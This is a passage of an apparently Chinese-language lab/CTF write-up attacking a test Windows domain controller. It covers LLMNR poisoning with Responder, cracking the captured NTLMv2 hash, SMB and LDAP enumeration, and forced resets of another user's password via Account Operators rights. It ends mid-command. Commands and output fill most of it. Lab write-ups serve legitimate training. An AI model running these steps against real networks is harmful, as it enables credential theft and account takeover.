https:\/\/nmap.org ) at 2025-06-12 20:53 EDT\nNmap scan report for 192.168.10.107\nHost is up (0.00073s latency).\n\nPORT    STATE SERVICE VERSION\n123\/udp open  ntp     NTP v3\n| ntp-info: \n|_  receive time stamp: 2025-06-13T15:48:58\nMAC Address: 08:00:27:CB:C3:14 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 10.86 seconds<\/code><\/pre>\n<p>\u6ca1\u53d1\u73b0\u4e1c\u897f\u3002<\/p>\n<h4>137\/UDP<\/h4>\n<p>\u8fdb\u884c\u63a2\u6d4b\uff1a<a href=\"https:\/\/book.hacktricks.wiki\/en\/network-services-pentesting\/137-138-139-pentesting-netbios.html?highlight=137#name-service\">https:\/\/book.hacktricks.wiki\/en\/network-services-pentesting\/137-138-139-pentesting-netbios.html?highlight=137#name-service<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ nmblookup -A $IP\nLooking up status of 192.168.10.107\n        SOUPEDECODE     &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; \n        DC01            &lt;00&gt; -         B &lt;ACTIVE&gt; \n        SOUPEDECODE     &lt;1c&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; \n        DC01            &lt;20&gt; -         B &lt;ACTIVE&gt; \n        SOUPEDECODE     &lt;1b&gt; -         B &lt;ACTIVE&gt; \n\n        MAC Address = 08-00-27-CB-C3-14\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ nbtscan $IP\/30\nDoing NBT name scan for addresses from 192.168.10.107\/30\n\nIP address       NetBIOS Name     Server    User             MAC address      \n------------------------------------------------------------------------------\n192.168.10.105   HGBE02           &lt;server&gt;  &lt;unknown&gt;        34:2e:b7:08:3d:a1\n192.168.10.107   DC01             &lt;server&gt;  &lt;unknown&gt;        08:00:27:cb:c3:14<\/code><\/pre>\n<p>\u6ca1\u5934\u7eea\u554a\u3002\u3002\u3002\u3002\u3002<\/p>\n<h3>LLMNR \u6295\u6bd2<\/h3>\n<p>\u770b\u5e08\u5085\u4eec\u7684wp\uff0c\u53d1\u73b0\u8fd9\u91cc\u9700\u8981\u5bf9\u9776\u673a\u8fdb\u884c\u4e00\u4e2a\u6d4b\u8bd5\uff0c\u6211\u505a\u7684 windows \u9776\u673a\u786e\u5b9e\u5c11\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ ping 192.168.10.107           \nPING 192.168.10.107 (192.168.10.107) 56(84) bytes of data.\n64 bytes from 192.168.10.107: icmp_seq=1 ttl=128 time=0.987 ms\n64 bytes from 192.168.10.107: icmp_seq=2 ttl=128 time=0.662 ms\n64 bytes from 192.168.10.107: icmp_seq=3 ttl=128 time=0.967 ms\n^C\n--- 192.168.10.107 ping statistics ---\n3 packets transmitted, 3 received, 0% packet loss, time 2001ms\nrtt min\/avg\/max\/mdev = 0.662\/0.872\/0.987\/0.148 ms<\/code><\/pre>\n<p>\u7136\u540e\u53d1\u73b0\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ responder -I eth0 -v \n                                         __\n  .----.-----.-----.-----.-----.-----.--|  |.-----.----.\n  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|\n  |__| |_____|_____|   __|_____|__|__|_____||_____|__|\n                   |__|\n\n           NBT-NS, LLMNR &amp; MDNS Responder 3.1.6.0\n\n  To support this project:\n  Github -&gt; https:\/\/github.com\/sponsors\/lgandx\n  Paypal  -&gt; https:\/\/paypal.me\/PythonResponder\n\n  Author: Laurent Gaffie (laurent.gaffie@gmail.com)\n  To kill this script hit CTRL-C\n\n[!] Responder must be run as root.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ sudo responder -I eth0 -v \n                                         __\n  .----.-----.-----.-----.-----.-----.--|  |.-----.----.\n  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|\n  |__| |_____|_____|   __|_____|__|__|_____||_____|__|\n                   |__|\n\n           NBT-NS, LLMNR &amp; MDNS Responder 3.1.6.0\n\n  To support this project:\n  Github -&gt; https:\/\/github.com\/sponsors\/lgandx\n  Paypal  -&gt; https:\/\/paypal.me\/PythonResponder\n\n  Author: Laurent Gaffie (laurent.gaffie@gmail.com)\n  To kill this script hit CTRL-C\n\n[+] Poisoners:\n    LLMNR                      [ON]\n    NBT-NS                     [ON]\n    MDNS                       [ON]\n    DNS                        [ON]\n    DHCP                       [OFF]\n\n[+] Servers:\n    HTTP server                [ON]\n    HTTPS server               [ON]\n    WPAD proxy                 [OFF]\n    Auth proxy                 [OFF]\n    SMB server                 [ON]\n    Kerberos server            [ON]\n    SQL server                 [ON]\n    FTP server                 [ON]\n    IMAP server                [ON]\n    POP3 server                [ON]\n    SMTP server                [ON]\n    DNS server                 [ON]\n    LDAP server                [ON]\n    MQTT server                [ON]\n    RDP server                 [ON]\n    DCE-RPC server             [ON]\n    WinRM server               [ON]\n    SNMP server                [ON]\n\n[+] HTTP Options:\n    Always serving EXE         [OFF]\n    Serving EXE                [OFF]\n    Serving HTML               [OFF]\n    Upstream Proxy             [OFF]\n\n[+] Poisoning Options:\n    Analyze Mode               [OFF]\n    Force WPAD auth            [OFF]\n    Force Basic Auth           [OFF]\n    Force LM downgrade         [OFF]\n    Force ESS downgrade        [OFF]\n\n[+] Generic Options:\n    Responder NIC              [eth0]\n    Responder IP               [192.168.10.106]\n    Responder IPv6             [fd00:4c10:d50a:f900:d8a5:2ca6:8023:decc]\n    Challenge set              [random]\n    Don&#039;t Respond To Names     [&#039;ISATAP&#039;, &#039;ISATAP.LOCAL&#039;]\n    Don&#039;t Respond To MDNS TLD  [&#039;_DOSVC&#039;]\n    TTL for poisoned response  [default]\n\n[+] Current Session Variables:\n    Responder Machine Name     [WIN-ZSMONS9XBC0]\n    Responder Domain Name      [VGNJ.LOCAL]\n    Responder DCE-RPC Port     [47249]\n\n[+] Listening for events...\n\n[*] [NBT-NS] Poisoned answer sent to 192.168.10.107 for name FILESERVER (service: File Server)\n[*] [MDNS] Poisoned answer sent to 192.168.10.107  for name FileServer.local\n[*] [MDNS] Poisoned answer sent to 192.168.10.107  for name FileServer.local\n[*] [MDNS] Poisoned answer sent to fe80::d908:b340:cd67:75e0 for name FileServer.local\n[*] [LLMNR]  Poisoned answer sent to 192.168.10.107 for name FileServer\n[*] [LLMNR]  Poisoned answer sent to fe80::d908:b340:cd67:75e0 for name FileServer\n[*] [LLMNR]  Poisoned answer sent to fe80::d908:b340:cd67:75e0 for name FileServer\n[*] [MDNS] Poisoned answer sent to fe80::d908:b340:cd67:75e0 for name FileServer.local\n[*] [LLMNR]  Poisoned answer sent to 192.168.10.107 for name FileServer\n[SMB] NTLMv2-SSP Client   : 192.168.10.107\n[SMB] NTLMv2-SSP Username : soupedecode\\xkate578\n[SMB] NTLMv2-SSP Hash     : xkate578::soupedecode:661833a474caef4b:2705FBC03C88C51E1DA862424B2106CD:010100000000000080FD9121DEDBDB01C95601CBAE89D1610000000002000800560047004E004A0001001E00570049004E002D005A0053004D004F004E0053003900580042004300300004003400570049004E002D005A0053004D004F004E005300390058004200430030002E00560047004E004A002E004C004F00430041004C0003001400560047004E004A002E004C004F00430041004C0005001400560047004E004A002E004C004F00430041004C000700080080FD9121DEDBDB01060004000200000008003000300000000000000000000000004000009A05ABEE76DFA3B2575A55983467789E597B55EE268E77B48DB077AFDA8FDC0C0A0010000000000000000000000000000000000009001E0063006900660073002F00460069006C0065005300650072007600650072000000000000000000\n[+] Exiting...<\/code><\/pre>\n<p>\u8fd9\u4e2a\u9a8c\u8bc1\u8fc7\u7a0b\u5c31\u80fd\u53d1\u73b0\u5b58\u5728\u8be5\u6f0f\u6d1e\u3002\u3002\u3002\u5f97\u5230\u65b0\u51ed\u8bc1\uff0c\u5c1d\u8bd5\u7834\u89e3\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ echo &quot;xkate578::soupedecode:661833a474caef4b:2705FBC03C88C51E1DA862424B2106CD:010100000000000080FD9121DEDBDB01C95601CBAE89D1610000000002000800560047004E004A0001001E00570049004E002D005A0053004D004F004E0053003900580042004300300004003400570049004E002D005A0053004D004F004E005300390058004200430030002E00560047004E004A002E004C004F00430041004C0003001400560047004E004A002E004C004F00430041004C0005001400560047004E004A002E004C004F00430041004C000700080080FD9121DEDBDB01060004000200000008003000300000000000000000000000004000009A05ABEE76DFA3B2575A55983467789E597B55EE268E77B48DB077AFDA8FDC0C0A0010000000000000000000000000000000000009001E0063006900660073002F00460069006C0065005300650072007600650072000000000000000000&quot; &gt; hash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ john -w=\/usr\/share\/wordlists\/rockyou.txt hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (netntlmv2, NTLMv2 C\/R [MD4 HMAC-MD5 32\/64])\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\njesuschrist      (xkate578)     \n1g 0:00:00:00 DONE (2025-06-12 21:10) 3.846g\/s 3938p\/s 3938c\/s 3938C\/s 123456..bethany\nUse the &quot;--show --format=netntlmv2&quot; options to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<p>\u5f97\u5230\u51ed\u8bc1<code>xkate578:jesuschrist<\/code>\uff0c\u5f00\u59cb\u8fdb\u4e00\u6b65\u4fe1\u606f\u641c\u96c6\uff01\uff01\uff01\uff01<\/p>\n<h3>\u4e8c\u6b21\u4fe1\u606f\u641c\u96c6<\/h3>\n<h4>smb\u670d\u52a1\u63a2\u6d4b<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ smbmap -H $IP -u xkate578 -p jesuschrist\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB                                                                                                  \n[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          \n\n[+] IP: 192.168.10.107:445      Name: 192.168.10.107            Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        ADMIN$                                                  NO ACCESS       Remote Admin\n        C$                                                      NO ACCESS       Default share\n        IPC$                                                    READ ONLY       Remote IPC\n        NETLOGON                                                READ ONLY       Logon server share \n        share                                                   READ, WRITE\n        SYSVOL                                                  READ ONLY       Logon server share \n[*] Closed 1 connections<\/code><\/pre>\n<p>\u53d1\u73b0\u5b58\u5728\u4e00\u4e2a\u53ef\u5199\u5171\u4eab\u76ee\u5f55\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">smb: \\YPILSAodqR\\&gt; ls\n^C\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ smbclient -U &quot;SOUPEDECODE.LOCAL\\xkate578&quot; \/\/$IP\/share \nPassword for [SOUPEDECODE.LOCAL\\xkate578]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                  DR        0  Fri Jun 13 12:07:57 2025\n  ..                                  D        0  Thu Aug  1 01:38:08 2024\n  desktop.ini                       AHS      282  Thu Aug  1 01:38:08 2024\n  user.txt                            A       70  Thu Aug  1 01:39:25 2024\n\n                12942591 blocks of size 4096. 10718255 blocks available\nsmb: \\&gt; get user.txt\ngetting file \\user.txt of size 70 as user.txt (0.5 KiloBytes\/sec) (average 0.5 KiloBytes\/sec)\nsmb: \\&gt; exit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ smbclient -U &quot;SOUPEDECODE.LOCAL\\xkate578&quot; \/\/$IP\/IPC$ \nPassword for [SOUPEDECODE.LOCAL\\xkate578]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\nNT_STATUS_NO_SUCH_FILE listing \\*\nsmb: \\&gt; exit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ smbclient -U &quot;SOUPEDECODE.LOCAL\\xkate578&quot; \/\/192.168.10.107\/NETLOGON\nPassword for [SOUPEDECODE.LOCAL\\xkate578]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Thu Aug  1 02:07:52 2024\n  ..                                  D        0  Sat Jun 15 15:30:47 2024\n\n                12942591 blocks of size 4096. 10718255 blocks available\nsmb: \\&gt; exit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ smbclient -U &quot;SOUPEDECODE.LOCAL\\xkate578&quot; \/\/192.168.10.107\/SYSVOL  \nPassword for [SOUPEDECODE.LOCAL\\xkate578]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Thu Aug  1 02:07:52 2024\n  ..                                  D        0  Sat Jun 15 15:21:21 2024\n  SOUPEDECODE.LOCAL                  Dr        0  Sat Jun 15 15:21:21 2024\n  YPILSAodqR                          D        0  Thu Aug  1 02:07:52 2024\n\n                12942591 blocks of size 4096. 10718255 blocks available\nsmb: \\&gt; cd SOUPEDECODE.LOCAL\nsmb: \\SOUPEDECODE.LOCAL\\&gt; ls\n  .                                   D        0  Sat Jun 15 15:30:47 2024\n  ..                                  D        0  Sat Jun 15 15:21:21 2024\n  DfsrPrivate                      DHSr        0  Sat Jun 15 15:30:47 2024\n  Policies                            D        0  Sat Jun 15 15:21:30 2024\n  scripts                             D        0  Thu Aug  1 02:07:52 2024\n\n                12942591 blocks of size 4096. 10718255 blocks available\nsmb: \\SOUPEDECODE.LOCAL\\&gt; cd ..\/YPILSAodqR\nsmb: \\YPILSAodqR\\&gt; ls\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ cat user.txt \n\ufffd\ufffd12f54a96f64443246930da001cafda8b<\/code><\/pre>\n<p>\u9664\u4e86flag\uff0c\u6ca1\u53d1\u73b0\u5565\u3002\u3002\u3002\u5c1d\u8bd5\u7528\u8fd9\u4e2a\u51ed\u8bc1\u8fdb\u884c\u767b\u5f55\uff0c\u4f46\u662f\u62a5\u9519\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131130462.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131130462.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250613091920513\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u6536\u96c6AD\u57df\u4fe1\u606f<\/h3>\n<p>\u4f7f\u7528<code>ldapdomaindump <\/code>\u5de5\u5177\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ mkdir domain\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03\/domain]\n\u2514\u2500$ ldapdomaindump $IP -u &#039;SOUPEDECODE.LOCAL\\xkate578&#039; -p jesuschrist\n[*] Connecting to host...\n[*] Binding to host\n[+] Bind OK\n[*] Starting domain dump\n[+] Domain dump finished\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03\/domain]\n\u2514\u2500$ grep -Pnir xkate578                               \ndomain_users.json:54297:            &quot;xkate578@soupedecode.local&quot;\ndomain_users.json:54330:            &quot;xkate578&quot;\ndomain_users.json:54360:            &quot;xkate578@soupedecode.local&quot;\ndomain_users_by_group.html:449:&lt;tr&gt;&lt;td&gt;Xenia Kate&lt;\/td&gt;&lt;td&gt;Xenia Kate&lt;\/td&gt;&lt;td&gt;xkate578&lt;\/td&gt;&lt;td&gt;06\/15\/24 20:04:39&lt;\/td&gt;&lt;td&gt;06\/13\/25 16:04:01&lt;\/td&gt;&lt;td&gt;06\/13\/25 16:04:01&lt;\/td&gt;&lt;td&gt;NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD&lt;\/td&gt;&lt;td&gt;08\/01\/24 05:37:18&lt;\/td&gt;&lt;td&gt;&lt;abbr title=&quot;S-1-5-21-2986980474-46765180-2505414164-1182&quot;&gt;1182&lt;\/abbr&gt;&lt;\/td&gt;&lt;td&gt;Adventure seeker and extreme sports fan&lt;\/td&gt;&lt;\/tr&gt;\ndomain_users_by_group.html:999:&lt;tr&gt;&lt;td&gt;Xenia Kate&lt;\/td&gt;&lt;td&gt;Xenia Kate&lt;\/td&gt;&lt;td&gt;xkate578&lt;\/td&gt;&lt;td&gt;06\/15\/24 20:04:39&lt;\/td&gt;&lt;td&gt;06\/13\/25 16:04:01&lt;\/td&gt;&lt;td&gt;06\/13\/25 16:04:01&lt;\/td&gt;&lt;td&gt;NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD&lt;\/td&gt;&lt;td&gt;08\/01\/24 05:37:18&lt;\/td&gt;&lt;td&gt;&lt;abbr title=&quot;S-1-5-21-2986980474-46765180-2505414164-1182&quot;&gt;1182&lt;\/abbr&gt;&lt;\/td&gt;&lt;td&gt;Adventure seeker and extreme sports fan&lt;\/td&gt;&lt;\/tr&gt;\ndomain_users.html:449:&lt;tr&gt;&lt;td&gt;Xenia Kate&lt;\/td&gt;&lt;td&gt;Xenia Kate&lt;\/td&gt;&lt;td&gt;xkate578&lt;\/td&gt;&lt;td&gt;&lt;a href=&quot;domain_users_by_group.html#cn_Account_Operators&quot; title=&quot;CN=Account Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL&quot;&gt;Account Operators&lt;\/a&gt;&lt;\/td&gt;&lt;td&gt;&lt;a href=&quot;domain_users_by_group.html#cn_Domain_Users&quot; title=&quot;CN=Domain Users,CN=Users,DC=SOUPEDECODE,DC=LOCAL&quot;&gt;Domain Users&lt;\/a&gt;&lt;\/td&gt;&lt;td&gt;06\/15\/24 20:04:39&lt;\/td&gt;&lt;td&gt;06\/13\/25 16:04:01&lt;\/td&gt;&lt;td&gt;06\/13\/25 16:04:01&lt;\/td&gt;&lt;td&gt;NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD&lt;\/td&gt;&lt;td&gt;08\/01\/24 05:37:18&lt;\/td&gt;&lt;td&gt;&lt;abbr title=&quot;S-1-5-21-2986980474-46765180-2505414164-1182&quot;&gt;1182&lt;\/abbr&gt;&lt;\/td&gt;&lt;td&gt;Adventure seeker and extreme sports fan&lt;\/td&gt;&lt;\/tr&gt;\ndomain_users.grep:419:Xenia Kate        Xenia Kate      xkate578        Account Operators       Domain Users    06\/15\/24 20:04:39       06\/13\/25 16:04:01       06\/13\/25 16:04:01       NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD   08\/01\/24 05:37:18       S-1-5-21-2986980474-46765180-2505414164-1182    Adventure seeker and extreme sports fan<\/code><\/pre>\n<ul>\n<li>Account Operators \u662f Active Directory (AD) \u4e2d\u7684\u4e00\u4e2a<strong>\u672c\u5730\u57df\u7ec4<\/strong>\uff0c\u5176\u6743\u9650\u8bbe\u8ba1\u7528\u4e8e\u7ba1\u7406\u57df\u5185\u7684\u7528\u6237\u3001\u7ec4\u548c\u8ba1\u7b97\u673a\u8d26\u6237\uff0c\u4f46\u6743\u9650\u8303\u56f4\u5b58\u5728\u7279\u5b9a\u9650\u5236\u3002<\/li>\n<li>\u53ef\u4ee5\u66f4\u6539\u6210\u5458\u7684\u5bc6\u7801\uff01\uff01\uff01<\/li>\n<li><strong>\u76f4\u63a5\u96b6\u5c5e\u7ec4<\/strong>\uff1a<code>Account Operators<\/code>\uff08\u8d26\u6237\u64cd\u4f5c\u5458\uff09\u548c <code>Domain Users<\/code>\uff08\u57df\u7528\u6237\uff09<\/li>\n<li>Account Operators \u7ec4\u7684\u9ed8\u8ba4\u6743\u9650\uff1a\n<ul>\n<li>\u8d26\u6237\u7ba1\u7406\uff1a\u521b\u5efa\u3001\u5220\u9664\u7528\u6237\u548c\u8ba1\u7b97\u673a\u8d26\u6237\uff0c\u91cd\u7f6e\u5bc6\u7801\uff08\u9700\u539f\u59cb\u5bc6\u7801\uff09<\/li>\n<li>\u5c5e\u6027\u4fee\u6539\uff1a\u4fee\u6539\u7528\u6237\u63cf\u8ff0\u3001\u7ec4\u6210\u5458\u5173\u7cfb\u7b49\uff0c\u4f46\u65e0\u6cd5\u4fee\u6539\u57df\u7ba1\u7406\u5458\u7ec4\uff08Domain Admins\uff09\u6216\u7ba1\u7406\u5458\u7ec4\uff08Administrators\uff09\u7684\u6210\u5458<\/li>\n<li>\u672c\u5730\u767b\u5f55\u6743\u9650\uff1a\u53ef\u5728\u57df\u63a7\u5236\u5668\uff08Domain Controller\uff09\u4e0a\u672c\u5730\u767b\u5f55<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>\u5c1d\u8bd5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u7ec4\u6210\u5458\u6709\u54ea\u4e9b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03\/domain]\n\u2514\u2500$ grep -Pnir &quot;Domain Users&quot; | grep &quot;Operators&quot;\ndomain_users.html:410:&lt;tr&gt;&lt;td&gt;Fanny Beth&lt;\/td&gt;&lt;td&gt;Fanny Beth&lt;\/td&gt;&lt;td&gt;fbeth103&lt;\/td&gt;&lt;td&gt;&lt;a href=&quot;domain_users_by_group.html#cn_Operators&quot; title=&quot;CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL&quot;&gt;Operators&lt;\/a&gt;&lt;\/td&gt;&lt;td&gt;&lt;a href=&quot;domain_users_by_group.html#cn_Domain_Users&quot; title=&quot;CN=Domain Users,CN=Users,DC=SOUPEDECODE,DC=LOCAL&quot;&gt;Domain Users&lt;\/a&gt;&lt;\/td&gt;&lt;td&gt;06\/15\/24 20:04:41&lt;\/td&gt;&lt;td&gt;06\/13\/25 15:25:41&lt;\/td&gt;&lt;td&gt;01\/01\/01 00:00:00&lt;\/td&gt;&lt;td&gt;NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD&lt;\/td&gt;&lt;td&gt;08\/01\/24 06:09:45&lt;\/td&gt;&lt;td&gt;&lt;abbr title=&quot;S-1-5-21-2986980474-46765180-2505414164-1221&quot;&gt;1221&lt;\/abbr&gt;&lt;\/td&gt;&lt;td&gt;Classic car restorer and automotive enthusiast&lt;\/td&gt;&lt;\/tr&gt;\ndomain_users.html:449:&lt;tr&gt;&lt;td&gt;Xenia Kate&lt;\/td&gt;&lt;td&gt;Xenia Kate&lt;\/td&gt;&lt;td&gt;xkate578&lt;\/td&gt;&lt;td&gt;&lt;a href=&quot;domain_users_by_group.html#cn_Account_Operators&quot; title=&quot;CN=Account Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL&quot;&gt;Account Operators&lt;\/a&gt;&lt;\/td&gt;&lt;td&gt;&lt;a href=&quot;domain_users_by_group.html#cn_Domain_Users&quot; title=&quot;CN=Domain Users,CN=Users,DC=SOUPEDECODE,DC=LOCAL&quot;&gt;Domain Users&lt;\/a&gt;&lt;\/td&gt;&lt;td&gt;06\/15\/24 20:04:39&lt;\/td&gt;&lt;td&gt;06\/13\/25 16:04:01&lt;\/td&gt;&lt;td&gt;06\/13\/25 16:04:01&lt;\/td&gt;&lt;td&gt;NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD&lt;\/td&gt;&lt;td&gt;08\/01\/24 05:37:18&lt;\/td&gt;&lt;td&gt;&lt;abbr title=&quot;S-1-5-21-2986980474-46765180-2505414164-1182&quot;&gt;1182&lt;\/abbr&gt;&lt;\/td&gt;&lt;td&gt;Adventure seeker and extreme sports fan&lt;\/td&gt;&lt;\/tr&gt;\ndomain_users.grep:380:Fanny Beth        Fanny Beth      fbeth103        Operators       Domain Users    06\/15\/24 20:04:41       06\/13\/25 15:25:41       01\/01\/01 00:00:00       NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD   08\/01\/24 06:09:45       S-1-5-21-2986980474-46765180-2505414164-1221    Classic car restorer and automotive enthusiast\ndomain_users.grep:419:Xenia Kate        Xenia Kate      xkate578        Account Operators       Domain Users    06\/15\/24 20:04:39       06\/13\/25 16:04:01       06\/13\/25 16:04:01       NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD   08\/01\/24 05:37:18       S-1-5-21-2986980474-46765180-2505414164-1182    Adventure seeker and extreme sports fan<\/code><\/pre>\n<h3>\u4fee\u6539\u57df\u7528\u6237\u5bc6\u7801<\/h3>\n<p>\u627e\u5230\u4e00\u4e2a\u540d\u4e3a<code>fbeth103<\/code>\u7684\u7528\u6237\uff0c\u5c1d\u8bd5\u5f3a\u884c\u4fee\u6539\u5bc6\u7801\uff1a<\/p>\n<h4>\u65b9\u6cd5\u4e00\uff1aimpacket-changepasswd<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03\/domain]\n\u2514\u2500$ impacket-changepasswd &#039;soupedecode\/fbeth103&#039;@$IP -altuser xkate578 -altpass jesuschrist -newpass hgbe02pass -no-pass -reset         \nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Setting the password of soupedecode\\fbeth103 as soupedecode\\xkate578\n[*] Connecting to DCE\/RPC as soupedecode\\xkate578\n[-] soupedecode\\xkate578 user is not allowed to set the password of the target<\/code><\/pre>\n<p>\u672a\u6210\u529f\u3002\u3002\u3002\u3002\u91cd\u65b0\u5bfc\u5165\u9776\u673a\uff0c\u4e3a\u6240\u6709\u7f51\u5361\u4fee\u6539mac\u5730\u5740\uff0c\u4fee\u6539\u540d\u79f0\uff0c\u542f\u52a8\uff0c\u6267\u884c\u547d\u4ee4\uff0c\u6210\u529f\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03\/domain]\n\u2514\u2500$ impacket-changepasswd &#039;soupedecode\/fbeth103&#039;@$IP -altuser xkate578 -altpass jesuschrist -newpass hgbe02pass -no-pass -reset \nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Setting the password of soupedecode\\fbeth103 as soupedecode\\xkate578\n[*] Connecting to DCE\/RPC as soupedecode\\xkate578\n[*] Password was changed successfully.\n[!] User no longer has valid AES keys for Kerberos, until they change their password again.<\/code><\/pre>\n<ul>\n<li><code>-no-pass<\/code> \u4e0d\u9700\u8981\u63d0\u4f9b\u539f\u6765\u7684\u5bc6\u7801<\/li>\n<li><code>-reset<\/code>\u751f\u6548<\/li>\n<li>\u5f3a\u884c\u91cd\u7f6e\u5bc6\u7801\u5e76\u751f\u6548<\/li>\n<\/ul>\n<h4>\u65b9\u6cd5\u4e8c\uff1abloodyAD<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03\/domain]\n\u2514\u2500$ bloodyAD -d SUPEDECDE.LCAL --host $IP -u xkate578 -p jesuschrist set password fbeth103 hgbe02pass\n[+] Password changed successfully!<\/code><\/pre>\n<h4>\u65b9\u6cd5\u4e09\uff1arpclient<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03\/domain]\n\u2514\u2500$ rpcclient -U &quot;xkate578&quot; $IP\nPassword for [WORKGROUP\\xkate578]:\nrpcclient $&gt; setuserinfo2 fbeth103 23 hgbe02pass  \n# 